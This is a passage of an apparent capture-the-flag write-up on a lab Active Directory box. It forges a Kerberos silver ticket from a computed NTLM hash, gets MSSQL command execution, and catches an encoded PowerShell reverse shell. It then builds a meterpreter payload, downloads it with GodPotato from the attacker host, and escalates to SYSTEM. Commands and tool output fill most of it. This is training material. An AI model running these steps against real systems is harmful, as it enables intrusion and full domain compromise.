          <td id="file-hash_convert-py-L3" class="blob-num js-line-number js-blob-rnum" data-line-number="3"></td>
          <td id="file-hash_convert-py-LC3" class="blob-code blob-code-inner js-file-line"><span class="pl-s1">ntlm_hash</span> <span class="pl-c1">=</span> <span class="pl-s1">hashlib</span>.<span class="pl-c1">new</span>(<span class="pl-s">'md4'</span>, <span class="pl-s1">password</span>.<span class="pl-c1">encode</span>(<span class="pl-s">'utf-16le'</span>)).<span class="pl-c1">hexdigest</span>()</td>
        </tr>
        <tr>
          <td id="file-hash_convert-py-L4" class="blob-num js-line-number js-blob-rnum" data-line-number="4"></td>
          <td id="file-hash_convert-py-LC4" class="blob-code blob-code-inner js-file-line"><span class="pl-en">print</span>(<span class="pl-s">f"NTLM Hash: <span class="pl-s1"><span class="pl-kos">{</span><span class="pl-s1">ntlm_hash</span><span class="pl-kos">}</span></span>"</span>)</td>
        </tr>
  </tbody></table>
</div>


    </div>

  </div>

</div>

      </div>
      <div class="gist-meta">
        <a href="https://gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a/raw/db2bab4897a950883eb551353ca8dc151f6dc817/hash_convert.py" style="float:right" class="Link--inTextBlock">view raw</a>
        <a href="https://gist.github.com/byt3n33dl3/2f719df2e45df933b74ac7f218c25e4a#file-hash_convert-py" class="Link--inTextBlock">
          hash_convert.py
        </a>
        hosted with &#10084; by <a class="Link--inTextBlock" href="https://github.com">GitHub</a>
      </div>
    </div>
</div>
</div><p>Just change the Password to &#8220;Trustno1&#8220;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GmOL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GmOL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:169163,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6e5762c2-eb48-4016-a656-7f87cd4b548b_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!GmOL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!GmOL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ae8a4ee-98a3-42e3-a669-25a45c7f360f_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p>sudo impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.129.11.224 -spn MSSQLSvc/breachdc.breach.vl:1433 Administrator</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.129.11.224 -spn MSSQLSvc/breachdc.breach.vl:1433 Administrator 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll
total 36
-rw-r--r-- 1 root root 1246 Apr  1 10:26 Administrator.ccache
drwxr-xr-x 2 root root 4096 Apr  1 10:12 bhce
. . .[SNIP]. . .</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=Administrator.ccache                                                  
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@BREACH.VL

Valid starting       Expires              Service principal
04/01/2026 10:26:12  03/29/2036 10:26:12  MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
        renew until 03/29/2036 10:26:12</code></pre></div><p>And it&#8217;s pwned!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql breachdc.breach.vl -u Administrator --use-kcache                       
MSSQL       breachdc.breach.vl 1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       breachdc.breach.vl 1433   BREACHDC         [+] breach.vl\Administrator from ccache (Pwn3d!)</code></pre></div><p>With-out wasting time let&#8217;s uses it to gain access into the box:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql breachdc.breach.vl -u Administrator --use-kcache -X "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwA. . .[SNIP]. . .kA"
MSSQL       breachdc.breach.vl 1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False)
MSSQL       breachdc.breach.vl 1433   BREACHDC         [+] breach.vl\Administrator from ccache (Pwn3d!)
[10:27:54] ERROR    Error when attempting to execute command via xp_cmdshell: timed out
. . .[SNIP]. . .</code></pre></div><p>And we got shell (I&#8217;m not even logon)</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.15.169] from (UNKNOWN) [10.129.11.224] 58765
whoami
breach\svc_mssql
PS C:\Windows\system32&gt; whoami
breach\svc_mssql
PS C:\Windows\system32&gt; hostname
BREACHDC</code></pre></div><ol start="7"><li><p><em>Windows Privilege Escalation Enumeration </em></p></li></ol><p>Bit surprised, that SVC_MSSQL gave this lot&#8217;s of dangerous access:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\Windows\system32&gt; whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
. . .[SNIP]. . .                                                    
Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ONkB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ONkB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 424w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 848w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 1272w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ONkB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png" width="1499" height="626" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:626,&quot;width&quot;:1499,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:173618,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93377e7c-2309-49c5-b51d-f6b4c4653da8_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ONkB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 424w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 848w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 1272w, https://substackcdn.com/image/fetch/$s_!ONkB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d3c1e9b-3205-49d3-a2ed-3bbb498d86eb_1499x626.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So let&#8217;s abuses it, easiet way would probably let Metasploit automate everything, or maybe manual God-Potato will do it.</p><ol start="8"><li><p><em>Windows Privilege Escalation Attack</em></p></li></ol><p>With Metasploit a bit failed but we&#8217;re good:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.169 LPORT=9002 -f exe -o pwn.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7680 bytes
Saved as: pwn.exe</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo msfconsole -q -x "use exploit/multi/handler; set LHOST tun0; set LPORT 9002; set payload windows/x64/meterpreter/reverse_tcp; exploit"
[*] Using configured payload generic/shell_reverse_tcp
LHOST =&gt; tun0
LPORT =&gt; 9002
payload =&gt; windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.15.169:9002 
[*] Sending stage (232006 bytes) to 10.129.11.224
[*] Meterpreter session 1 opened (10.10.15.169:9002 -&gt; 10.129.11.224:58851) at 2026-04-01 10:34:33 -0400

meterpreter &gt; getuid
Server username: BREACH\svc_mssql
meterpreter &gt; getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege

meterpreter &gt; getsystem
[-] priv_elevate_getsystem: Operation failed: All pipe instances are busy. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter &gt; getsystem -t 4
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (RPCSS variant)
. . .[SNIP]. . .</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!s66h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!s66h!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 424w, https://substackcdn.com/image/fetch/$s_!s66h!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 848w, https://substackcdn.com/image/fetch/$s_!s66h!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 1272w, https://substackcdn.com/image/fetch/$s_!s66h!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!s66h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png" width="635" height="387" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:387,&quot;width&quot;:635,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:469535,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192855357?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!s66h!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 424w, https://substackcdn.com/image/fetch/$s_!s66h!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 848w, https://substackcdn.com/image/fetch/$s_!s66h!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 1272w, https://substackcdn.com/image/fetch/$s_!s66h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F352cd50f-3e74-43e5-8a27-c762a10e458c_635x387.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So I did manual and re-trigger the MSV binary as SYSTEM:</p><ul><li><p><a href="https://github.com/BeichenDream/GodPotato/releases/">github.com/BeichenDream/GodPotato/releases/</a></p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\programdata&gt; iwr -uri http://10.10.15.169/pwn.exe -outfile pwn.exe
PS C:\programdata&gt; .\pwn.exe
PS C:\programdata&gt; iwr -uri http://10.10.15.169/GodPotato-NET4.exe -outfile gp.exe
PS C:\programdata&gt; .\gp.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140717890338816
[*] DispatchTable: 0x140717892929400
[*] UseProtseqFunction: 0x140717892221744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\3e124021-f0a5-4fa9-ad1f-a5f229ebdf11\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000d802-1470-ffff-454a-506170a8979d
[*] DCOM obj OXID: 0xdc5a74c3ba86cd0f
[*] DCOM obj OID: 0x5bb30f5398954ac
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 912 Token:0x204  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2668
nt authority\system</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\programdata&gt; dir


    Directory: C:\programdata


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         2/10/2022  12:59 AM                Amazon                                                               
d-----          4/1/2026   1:53 PM                docker                                                               
d---s-         2/17/2022  10:26 AM                Microsoft                                                            
d-----         4/17/2025  12:40 AM                Package Cache                                                        
d-----         4/16/2025  11:23 PM                regid.1991-06.com.microsoft                                          
d-----          5/8/2021   8:20 AM                SoftwareDistribution                                                 
d-----          5/8/2021   9:36 AM                ssh                                                                  
d-----         9/15/2021   3:11 AM                USOPrivate                                                           
d-----          5/8/2021   8:20 AM                USOShared                                                            
d-----         4/16/2025  11:28 PM                VMware                                                               
-a----          4/1/2026   2:39 PM          57344 gp.exe                                                               
-a----          4/1/2026   2:33 PM           7680 pwn.exe                                                              


PS C:\programdata&gt; .\gp.exe -cmd "cmd /c C:\programdata\pwn.exe"
[*] CombaseModule: 0x140717890338816
[*] DispatchTable: 0x140717892929400
[*] UseProtseqFunction: 0x140717892221744
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\f71c58f9-ee28-402a-9ddc-bdad80222c9d\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00001c02-1a4c-ffff-827a-e184854e8372
[*] DCOM obj OXID: 0xf9d0cce26b8bb415
